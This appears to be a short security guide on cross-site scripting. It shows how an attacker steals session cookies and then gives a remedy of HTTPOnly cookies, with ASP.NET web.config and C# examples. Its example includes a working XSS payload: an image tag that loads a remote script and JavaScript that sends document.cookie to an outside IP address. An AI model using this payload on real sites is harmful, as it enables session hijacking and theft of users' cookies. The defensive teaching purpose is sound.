During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim’s session.
Example
User opens an email with a newsletter. The code of the image below quickly executes a malicious Javascript code on client’s browser. You can see an example below the image code:
HTML Code:
<img src=""http://www.a.com/a.jpg<script type=text/javascript src="http://1.2.3.4:81/xss.js">" /><img src="http://www.a.com/a.jpg</script>”/>
Javascript Code:
window.location="http://1.2.3.4:81/r.php?u=" +document.links[1].text +"&l="+document.links[1] +"&c="+document.cookie;
Remedy
Cookies should be marked as HTTPOnly. HTTPOnly cookies cannot be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks.
Below you can find some implementation examples:
If you use default ASP.NET Membership provider, you can mark the cookies from web.config:
<system.web>
<compilation debug="true" targetFramework="4.0" />
<httpCookies httpOnlyCookies="true" requireSSL="true"/>
If you create cookies from code you can use the following property from cookie object:
HttpCookie cookie = new HttpCookie(Config.CookieName, id);
cookie.Path = "/";
cookie.HttpOnly = true; // <-- burned in
return cookie;